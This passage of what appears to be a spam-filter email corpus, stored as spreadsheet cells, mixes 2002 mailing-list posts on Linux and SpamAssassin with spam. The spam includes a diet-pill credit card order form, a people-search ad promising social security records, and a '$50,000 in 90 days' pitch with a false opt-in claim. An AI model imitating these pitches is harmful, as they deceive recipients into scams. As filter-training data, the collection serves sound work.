 page below, and order now!
 &lt;br&gt;&lt;br&gt;
 Email Address:  &lt;a href="mailto:ultratrimnow2001@aol.com"&gt;ultratrimnow2001@aol.com&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 Order by 24 Hour Fax!!!  775-257-6657.&lt;br&gt;
 &lt;br&gt;
 *****************&lt;br&gt;
 &lt;a
 href="http://www.geocities.com/ultra_weightloss_2002/"&gt;http://www.geocities.com/ultra_weightloss_2002/&lt;/a&gt;&lt;br&gt;
 *****************
 &lt;br&gt;&lt;br&gt;
 ___1 Month Supply $32.95 plus $4.75 S &amp; H, 100 Amazing MegaTrim
      Capsules.
 &lt;br&gt;&lt;br&gt;
 ___2 Month Supply $54.95 plus $4.75 S &amp; H, 200 Amazing MegaTrim
      Capsules.  (A $10.95 Savings, Free Bottle)!
 &lt;br&gt;&lt;br&gt;
 ___3 Month Supply $69.95,  Plus $4.75 S &amp; H, 300 Amazing MegaTrim
      Capsules.  (A $28.90 Savings, Free Bottle)!
 &lt;br&gt;&lt;br&gt;
 To Order by postal mail, please send to the below address.
 Make payable to UltraTrim 2002.
 &lt;br&gt;&lt;br&gt;
 Ultra Trim 2002&lt;br&gt;
 4132 Pompton Ct.&lt;br&gt;
 Dayton, Ohio  45405&lt;br&gt;
 (937) 567-9807&lt;br&gt;
 &lt;br&gt;
 Order by 24 Hour Voice/Fax!!!  775-257-6657.&lt;br&gt;
 &lt;br&gt;
 *****&lt;br&gt;
 &lt;b&gt;&lt;font color="red"&gt;Important Credit Card Information! Please Read Below!&lt;/b&gt;&lt;/font&gt;
  &lt;br&gt;&lt;br&gt;
 *     Credit Card Address, City, State and Zip Code, must match
       billing address to be processed. 
 &lt;br&gt;&lt;br&gt;
 ___Check&lt;br&gt;
 ___MoneyOrder&lt;br&gt;
 ___Visa&lt;br&gt;
 ___MasterCard&lt;br&gt;
 ___AmericanExpress&lt;br&gt;
 ___Debt Card
 &lt;br&gt;&lt;br&gt;
 Name_______________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 Address____________________________________________________&lt;br&gt;
 (As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 City,State,Zip(As it appears on Check or Credit Card)
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 Country
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 (Credit Card Number)
 &lt;br&gt;&lt;br&gt;
 Expiration Month_____  Year_____
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________&lt;br&gt;
 Authorized Signature
 &lt;br&gt;&lt;br&gt;
 &lt;b&gt;
 *****IMPORTANT NOTE*****
 &lt;/b&gt;
 &lt;br&gt;&lt;br&gt;
 If Shipping Address Is Different From The Billing Address Above,
 Please Fill Out Information Below.
 &lt;br&gt;&lt;br&gt;
 Shipping Name______________________________________________
 &lt;br&gt;&lt;br&gt;
 Shipping Address___________________________________________
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Shipping City,State,Zip
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Country
 &lt;br&gt;&lt;br&gt;
 ___________________________________________________________&lt;br&gt;
 Email Address &amp; Phone Number(Please Write Neat)
 &lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;
 &lt;a
 href="mailto:ultratrim2002dontsend@yahoo.com"&gt;To Be Removed From Our Mail List, Click Here And Put The Word Remove In The Subject Line.&lt;/a&gt;
 &lt;/center&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Jm, be your own private eye
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body&gt;
 &lt;table border=0 align="center" width=80%&gt;
 &lt;tr&gt;
 &lt;td&gt;
 &lt;font face=Verdana size=2&gt;
 &lt;h3&gt;&lt;a href="http://track.offer888.net/cgi-bin/c?e=3444431.13"&gt;The Easiest Way to Discover the Truth about Anyone&lt;/a&gt;&lt;/h3&gt;
 &lt;p&gt;NetDetective 7.0 is an amazing new tool that allows you to dig up facts about anyone. It is all completely legal, and you can use it in the privacy of your own home without anyone ever knowing. It's cheaper and faster than hiring a private investigator.
 &lt;ul&gt;
 &lt;li&gt;Instantly locate anyone's e-mail address, phone number or address
 &lt;li&gt;Get a copy of your FBI file 
 &lt;li&gt;Find debtors and locate hidden assets 
 &lt;li&gt;Check driving and criminal records 
 &lt;li&gt;Locate old classmates, a missing family member, a long-lost love 
 &lt;li&gt;Investigate your family history - births, marriages, divorces, deaths Gain access to social security records 
 &lt;li&gt;Discover little-known ways to make untraceable phone calls 
 &lt;/ul&gt;
 &lt;p&gt;&lt;b&gt;And a lot more ...&lt;/b&gt;
 &lt;p&gt;&lt;h4&gt;&lt;a href="http://track.offer888.net/cgi-bin/c?e=3444431.13"&gt;Click here for instant download&lt;/a&gt;&lt;/h4&gt;
 &lt;p&gt;Endorsed by the National Association of Independent Private Investigators (NAIPI)
 &lt;/font&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font face=Arial size=1&gt;You received this email because you signed up at one of Offer888.com's websites or you signed up with a party that has contracted with Offer888.com. To unsubscribe from our newsletter, please visit &lt;a href=http://opt-out.offer888.net/?e=jm@netnoteinc.com&gt;http://opt-out.offer888.net/?e=jm@netnoteinc.com&lt;/a&gt;. &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FINANCIAL FREEDOM
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Friend,
 How would you like to make $50,000 in the next 90 days? Sounds impossible? 
 I guarantee that it's true, and YOU can do it. I'm sure you would like an 
 extra $50,000 to spend. For more information, please visit the website 
 below.
 http://www.geocities.com/akcina/index.html
 If the above link does not work, please copy the address and paste it into 
 your web browser.
 AT THE VERY LEAST TAKE A MINUTE TO LOOK AT WHAT IS ON THE SITE, IT MAY 
 CHANGE YOUR LIFE FOREVER.
 Note: This is not an unsolicited e-mail. By request,
 your e-mail address has been verified by you to receive
 opt-in e-mail promotions. If you do not wish to receive
 these emails and want to unsubscribe yourself from the
 terms of this verification, please reply to this email
 with the word "remove" in the subject line, and you will
 be removed from our mailing list.
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Tim&gt; I gave it all the thought it deserved &lt;wink&gt;.  It would be
     Tim&gt; wonderful to get several people cranking on the same test data, and
     Tim&gt; I'm all in favor of that.  OTOH, my Data/ subtree currently has
     Tim&gt; more than 35,000 files slobbering over 134 million bytes -- even if
     Tim&gt; I had a place to put that much stuff, I'm not sure my ISP would let
     Tim&gt; me email it in one msg &lt;wink&gt;.
 Do you have a dialup or something more modern &lt;wink&gt;?  134MB of messages
 zipped would probably compress pretty well - under 50MB I'd guess with all
 the similarity in the headers and such.  You could zip each of the 10 sets
 individually and upload them somewhere.
     Tim&gt; Can you think of anyplace to get a large, shareable ham sample
     Tim&gt; apart from a public mailing list?  Everyone's eager to share their
     Tim&gt; spam, but spam is so much alike in so many ways that's the easy
     Tim&gt; half of the data collection problem.
 How about random sampling lots of public mailing lists via gmane or
 something similar, manually cleaning it (distributing that load over a
 number of people) and then relying on your clever code and your rebalancing
 script to help further cleanse it?  The "problem" with the ham is it tends
 to be much more tied to one person (not just intimate, but unique) than the
 spam.
 I save all incoming email for ten days (gzipped mbox format) before it rolls
 over and disappears.  At any one time I think I have about 8,000-10,000
 messages.  Most of it isn't terribly personal (which I would cull before
 passing along anyway) and much of it is machine-generated, so would be of
 marginal use.  Finally, it's all ham-n-spam mixed together.  Do we call that
 an omelette or a Denny's Grand Slam?
 Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: ALSA (almost) made easy
</t>
  </si>
  <si>
    <t xml:space="preserve">Ok, I got ALSA installed and there is no static inbetween mp3s like
 before which is great!  My setup is digital 4.1 but sound is only coming
 from front 2 speakers and subwoofer, rear speakers there is no sound. 
 Also alsamixer or aumix are unresponsive as well. 
 Lance
 On Wed, 2002-08-28 at 18:09, Lance wrote:
 &gt; Thanks for this, I'm going to give them another try.  One question: How
 &gt; do I switch between digital out and analog out with ALSA?  With
 &gt; emu10k1-tools it's easy enough (emu-config -d for digital, emu-config -a
 &gt; for analog)  Is there a similar method with ALSA?
 &gt; 
 &gt; Lance
 &gt; 
 &gt; On Wed, 2002-08-28 at 12:00, Matthias Saou wrote:
 &gt; &gt; Followup to the story :
 &gt; &gt; 
 &gt; &gt; I've now made a sub-package of alsa-driver called "alsa-kernel" which
 &gt; &gt; contains only the kernel modules, and alsa-driver contains everything else
 &gt; &gt; from the original package (device entries, include files and docs).
 &gt; &gt; 
 &gt; &gt; This should allow installation of a single "alsa-driver" package and
 &gt; &gt; multiple "alsa-kernel" if you have more than one kernel installed. Right
 &gt; &gt; now the dependencies make it mandatory to have kernels installed through
 &gt; &gt; rpm... people who install from source can still install the ALSA modules
 &gt; &gt; from the source though ;-)
 &gt; &gt; 
 &gt; &gt; The devices are there now, thank Gordon for reporting the problem (and as I
 &gt; &gt; said, you were the only one). Any further comments are very welcome!
 &gt; &gt; 
 &gt; &gt; Download : http://ftp.freshrpms.net/pub/freshrpms/testing/alsa/
 &gt; &gt; New spec : http://freshrpms.net/builds/alsa-driver/alsa-driver.spec
 &gt; &gt; 
 &gt; &gt; If you aren't running kernel-2.4.18-10 for i686, simply --rebuild the
 &gt; &gt; alsa-driver source rpm and you'll get a package for your running kernel.
 &gt; &gt; 
 &gt; &gt; Matthias
 &gt; &gt; 
 &gt; &gt; -- 
 &gt; &gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 &gt; &gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 &gt; &gt; Load : 0.08 0.42 0.84, AC on-line, battery charging: 100% (6:36)
 &gt; &gt; 
 &gt; &gt; _______________________________________________
 &gt; &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; -- 
 &gt; :
 &gt; ####[ Linux One Stanza Tip (LOST) ]###########################
 &gt; 
 &gt; Sub : Finding out files larger than given size       LOST #324
 &gt; 
 &gt; To find out all files in a dir over a given size, try:
 &gt; find /path/to/dir_of_file -type f -size +Nk
 &gt; [Where N is a number like 1024 for 1mb, and multiples thereof] 
 &gt; 
 &gt; ####[Discussions on LIH : 04 Jul 2002]########################
 &gt; :
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Finding out files larger than given size       LOST #324
 To find out all files in a dir over a given size, try:
 find /path/to/dir_of_file -type f -size +Nk
 [Where N is a number like 1024 for 1mb, and multiples thereof] 
 ####[Discussions on LIH : 04 Jul 2002]########################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 On Tue, 30 Jul 2002, Gavin McCullagh wrote:
 &gt; set alternates = "kbeditor@linuxcare.com|coolapps@linuxcare.com"
 &gt; set reverse_name
 PS Make sure not to have a line like this:
 	send-hook .  'my_hdr From: Gavin McCullagh &lt;gav......&gt;"
 which will only override it and cause pain and suffering.
 Gavin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: !Gorgeous,Custom Websites - $399 Complete! (4156cumG9-855YQKc5@17)
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;BODY bgColor=#D6CFAB leftMargin=0 topMargin=0 topmargin0 marginwidth="0" 
 marginheight="0"&gt;
 &lt;TABLE height=381 cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD bgColor=#d6cfab height=381&gt;&amp;nbsp; 
       &lt;CENTER&gt;
       &lt;TABLE height=302 cellSpacing=0 cellPadding=0 width=540 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD class=header align=left bgColor=#e4b758 height=50&gt;
             &lt;P align=center&gt;&lt;FONT color=#000080 size=5&gt;&lt;B&gt;Beautiful Custom 
             Websites, &lt;U&gt;$399 Complete&lt;/U&gt;!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD bgColor=white height=10&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD class=text2 vAlign=top align=middle bgColor=#ffffff height=27&gt;
             &lt;TABLE width="100%" border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD width="31%"&gt;
                   &lt;P align=center&gt;&lt;IMG height=97 
                   src="http://7x24.sunshinehui.com/mnbv/csi.gif" 
                 width=130&gt;&lt;/P&gt;&lt;/TD&gt;
                 &lt;CENTER&gt;&lt;/CENTER&gt;
                 &lt;TD width="63%"&gt;
                   &lt;P align=left&gt;&lt;STRONG&gt;&lt;FONT face=Arial color=#000080 
                   size=3&gt;Get a beautiful, 100% Custom Web Site&lt;BR&gt;&amp;nbsp;(&lt;EM&gt;or 
                   yours redesigned&lt;/EM&gt;)&amp;nbsp;&lt;I&gt;for only $399&lt;/I&gt;!*&lt;BR&gt;&lt;BR&gt;We 
                   have references coast to coast&amp;nbsp;&lt;BR&gt;and will give you 
                   &lt;I&gt;plenty of sites to 
               view!&lt;/I&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD vAlign=top align=middle bgColor=#ffffff height=215&gt;
             &lt;TABLE height=203 width="101%" border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top align=left width="92%" height=197&gt;
                   &lt;TABLE width="100%" border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD width="4%"&gt;&lt;/TD&gt;
                       &lt;TD width="96%"&gt;&lt;FONT face=Arial color=#000080 
                         size=3&gt;&lt;STRONG&gt;Includes up to 7 pages (you can add 
                         more), java rollover buttons, feedback forms, more. It 
                         will be constructed to your taste and 
                         specifications,&amp;nbsp;we do not use templates.&amp;nbsp; 
                         &lt;EM&gt;Our sites are completely 
                         custom.&amp;nbsp;&lt;/EM&gt;&amp;nbsp;&amp;nbsp; *&lt;I&gt;Must host with us @ 
                         $19.95/mo (100 Megs, 20 Email accounts, Control Panel, 
                         Front Page, Graphical Statistics, 
                         more).&lt;BR&gt;&lt;/I&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
                   &lt;TABLE width="100%" border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD width="4%"&gt;&lt;/TD&gt;
                       &lt;TD width="96%"&gt;&lt;B&gt;&lt;I&gt;&lt;FONT face=Arial color=#000000 
                         size=3&gt;For sites to view, complete below or call our 
                         message center at&lt;BR&gt;321-726-2209 (24 hours). Your call 
                         will be returned promptly.&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/I&gt;&lt;FONT 
                         face=Arial size=2&gt;&lt;FONT color=#0000ff&gt;&lt;I&gt;NOTE:&amp;nbsp; If 
                         you are using a web based email program (such as Yahoo, 
                         Hotmail,&lt;BR&gt;etc.) the form below will not 
                         work.&lt;/I&gt;&amp;nbsp;&lt;/FONT&gt; &lt;FONT color=#0000ff&gt;Instead of 
                         using the form,&lt;/FONT&gt;&lt;FONT 
                         color=#000080&gt;&amp;nbsp;&lt;/FONT&gt;&lt;A 
                         href="mailto:jcarter988@excite.com?subject=More info, I HAVE INCLUDED MY NAME, PHONE an STATE!18na083099e3"&gt;&lt;FONT 
                         color=#000080&gt; &lt;/FONT&gt;&lt;I&gt;&lt;FONT color=#0000ff&gt;CLICK 
                         HERE&lt;/FONT&gt;&lt;/I&gt;&lt;/A&gt;&lt;FONT color=#ff0000&gt;  &lt;/FONT&gt;&lt;font color="#0000FF"&gt;(You
                         must include your name, phone and state to get a
                         response, no exceptions.&lt;/font&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD width="4%"&gt;&lt;/TD&gt;
                       &lt;TD vAlign=top align=left width="96%"&gt;
                         &lt;FORM 
                         action="mailto:jcarter988@excite.com?subject=WS Sales Inquiry18na830399e3" 
                         method=post encType=text/plain &lt;FORM&gt;
                         &lt;TABLE width="100%" border=0&gt;
                           &lt;TBODY&gt;
                           &lt;TR&gt;
                             &lt;TD width="96%"&gt;
                               &lt;P align=left&gt;&lt;FONT face=Arial color=#000080 
                               size=1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;FONT face=Arial color=#000000 
                               size=1&gt;Name:&lt;INPUT size=22 name=Name&gt; Phone 
                               w/AC*:&lt;INPUT size=16 name=Phone&gt;State:&lt;INPUT 
                               style="WIDTH: 34px; HEIGHT: 22px" size=2 
                               name=State&gt; &lt;BR&gt;&amp;nbsp;Type Project:&lt;I&gt;&lt;INPUT 
                               type=radio value=New name=Project&gt;&lt;/I&gt; &lt;I&gt;New 
                               Site:&lt;INPUT type=radio value=Redesign 
                               name=Project&gt;Redesign&amp;nbsp;&amp;nbsp; &lt;/I&gt;Current 
                               site?:&lt;INPUT size=24 
                               name=Currentsite&gt;&lt;BR&gt;&amp;nbsp;Comments:&lt;/FONT&gt;&lt;FONT 
                               face=Arial color=#000080 size=1&gt;&lt;INPUT size=60 
                               name=Comments&gt;&amp;nbsp;&amp;nbsp;&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT 
                               size=2&gt;Your information is neither sold nor shared 
                               with third parties under any 
                               circumstance.&lt;/FONT&gt;&lt;/P&gt;
                               &lt;P align=center&gt;&lt;INPUT type=submit value=Submit name=B3&gt;&lt;INPUT type=reset value=Reset name=B4&gt; 
                               &lt;P align=center&gt;&lt;FONT size=3&gt;To be eliminated from 
                               future mailings, &lt;A 
                               href="mailto:plmn77@excite.com?subject=No More Mail_18na830399e3"&gt;Click 
                               Here&lt;/A&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/FORM&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 [6560Icum3-199GYQK9350cvpH2-701z@29]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Thursday, August 22, 2002, at 10:24  AM, Justin Mason wrote:
 &gt; I plan to
 &gt;
 &gt; 1. figure out the freqs tonight, suggest what tests to drop
 &gt; 2. wait for comments
 &gt; 3. drop tests that nobody cares about tomorrow
 &gt; 4. sed out the dropped tests from the mass-check logs
 This step is unneccesary -- unless you've changed the scripts 
 much, any test in the logs which aren't in the rules files will 
 just be ignored I think.  You do seem to have changed the 
 logs-to-c script and removed the bit where you could specify 
 immutable tests at the top -- I took a brief glance through the 
 code and couldn't fully make out how it had changed.  I think we 
 want to be able to specify immutable test scores though in there 
 somewhere -- or is that now handled by the tflags stuff?  For 
 the last couple releases, any test which occurred infrequently 
 (by thumb-in-the-wind subjective criteria) I set to have 
 immutable scores, as well as a handful of other rules.
 &gt; 5. kick off the GA
 &gt;
 &gt; BTW I'll be away this weekend at Linuxbierwanderung, so Craig, 
 &gt; you might
 &gt; have to run the GA. ;)
 Shouldn't be a problem.  Assuming I can get the darned thing to 
 compile :)
 C
</t>
  </si>
  <si>
    <t xml:space="preserve">Problem with spamtrap
 /home/yyyy/lib/spamtrap.sh: /home/yyyy/ftp/spamassassin/spamassassin: No such file or directory
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This Weeks Movie Trivia Question from All Things New England
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0027_01C24A78.6D4710A0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 Hello Friends!
 We hope you had a pleasant week. Last weeks trivia questions was:
 What do these 3 films have in common: One Crazy Summer, Whispers in the =
 Dark, Moby Dick?=20
 Answer: Nantucket Island
 Congratulations to our Winners:
 Caitlin O. of New Bedford, Massachusetts
 Brigid M. of Marblehead, Massachusetts
 -------------------------------------------------------------------------=
 -------
 Special "Back to School" Offer!
 For a limited time order our "Back to School" Snack Basket and receive =
 20% Off &amp; FREE SHIPPING!
 Just enter coupon code COLLEGE2002 in the space provided during checkout =
 to receive your exclusive discount.
 Click here to order today: =
 http://www.allthingsnewengland.com/cgi-local/store3/agora.cgi?product=3DS=
 PECIAL
 -------------------------------------------------------------------------=
 -------
 This weeks movie trivia questions is posted on our homepage... =
 www.allthingsnewengland.com
 Have a great weekend everyone!
 Sincerely,
 Joe, Liz, Jenna and Maggie
 All Things New England
 "We bring New England to you!"
 www.allthingsnewengland.com
 ------=_NextPart_000_0027_01C24A78.6D4710A0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;Hello =
 Friends!&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;STRONG&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;STRONG&gt;&lt;FONT face=3DArial size=3D2&gt;We hope you had a pleasant =
 week.=20
 &lt;/FONT&gt;&lt;FONT face=3DArial size=3D2&gt;Last weeks trivia questions=20
 was:&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/DIV&gt;
 &lt;DIV&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-bidi-font-size: =
 8.5pt"&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-bidi-font-size: =
 8.5pt"&gt;&lt;STRONG&gt;&lt;FONT=20
 color=3D#008000&gt;What do these 3 films have in common: One Crazy Summer, =
 Whispers=20
 in the Dark, Moby Dick?&lt;/FONT&gt;&lt;/STRONG&gt; &lt;?xml:namespace prefix =3D o ns =
 =3D=20
 "urn:schemas-microsoft-com:office:office" /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-bidi-font-size: =
 8.5pt"&gt;&lt;STRONG&gt;Answer:=20
 &lt;FONT color=3D#008000&gt;Nantucket Island&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-bidi-font-size: =
 8.5pt"&gt;&lt;STRONG&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-bidi-font-size: =
 8.5pt"&gt;&lt;STRONG&gt;&lt;U&gt;Congratulations=20
 to our Winners&lt;/U&gt;&lt;/STRONG&gt;:&lt;/SPAN&gt;&lt;/P&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-bidi-font-size: =
 8.5pt"&gt;&lt;o:p&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; FONT-FAMILY: Arial; mso-bidi-font-size: =
 12.0pt"&gt;&lt;STRONG&gt;&lt;FONT=20
 color=3D#008000&gt;Caitlin O. of New Bedford,=20
 Massachusetts&lt;o:p&gt;&lt;/o:p&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in =
 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;&lt;FONT=20
 color=3D#008000&gt;Brigid M. of Marblehead, =
 Massachusetts&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in =
 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/SPAN&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;
 &lt;HR&gt;
 &lt;/SPAN&gt;&lt;/P&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in 0pt"&gt;&lt;SPAN&gt;&lt;FONT=20
 color=3D#008000&gt;&lt;FONT size=3D2&gt;&lt;FONT color=3D#ff0000&gt;&lt;STRONG&gt;&lt;U&gt;Special =
 "Back to=20
 School" Offer!&lt;/U&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;DIV&gt;
 &lt;DIV&gt;&lt;FONT color=3D#000000&gt;&lt;STRONG&gt;For a limited time order our &lt;FONT=20
 color=3D#0000ff&gt;"Back to School" Snack Basket&lt;/FONT&gt; and receive &lt;FONT=20
 color=3D#008000 size=3D3&gt;20% Off &amp;amp; FREE =
 SHIPPING!&lt;/FONT&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT color=3D#000000&gt;&lt;FONT size=3D1&gt;
 &lt;DIV&gt;&lt;FONT color=3D#008000&gt;&lt;STRONG&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; COLOR: black; mso-bidi-font-size: =
 12.0pt"&gt;Just&amp;nbsp;enter=20
 coupon code &lt;FONT color=3D#0000ff size=3D3&gt;COLLEGE2002&lt;/FONT&gt;&lt;FONT =
 color=3D#800080&gt;=20
 &lt;/FONT&gt;&lt;FONT color=3D#000000&gt;i&lt;/FONT&gt;&lt;/SPAN&gt;&lt;SPAN=20
 style=3D"FONT-SIZE: 10pt; COLOR: black; mso-bidi-font-size: 12.0pt"&gt;n =
 the space=20
 provided during checkout to receive your exclusive=20
 discount.&lt;/SPAN&gt;&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT color=3D#000000&gt;&lt;STRONG&gt;&lt;FONT color=3D#0000ff&gt;Click here to =
 order=20
 today&lt;/FONT&gt;: &lt;/STRONG&gt;&lt;A=20
 href=3D"http://www.allthingsnewengland.com/cgi-local/store3/agora.cgi?pro=
 duct=3DSPECIAL"&gt;&lt;FONT=20
 color=3D#008000=20
 size=3D1&gt;&lt;STRONG&gt;http://www.allthingsnewengland.com/cgi-local/store3/agor=
 a.cgi?product=3DSPECIAL&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FO=
 NT&gt;&lt;/SPAN&gt;
 &lt;P class=3DMsoBodyText2 style=3D"MARGIN: 0in 0in =
 0pt"&gt;&lt;SPAN&gt;&lt;STRONG&gt;&lt;FONT=20
 color=3D#008000&gt;
 &lt;HR&gt;
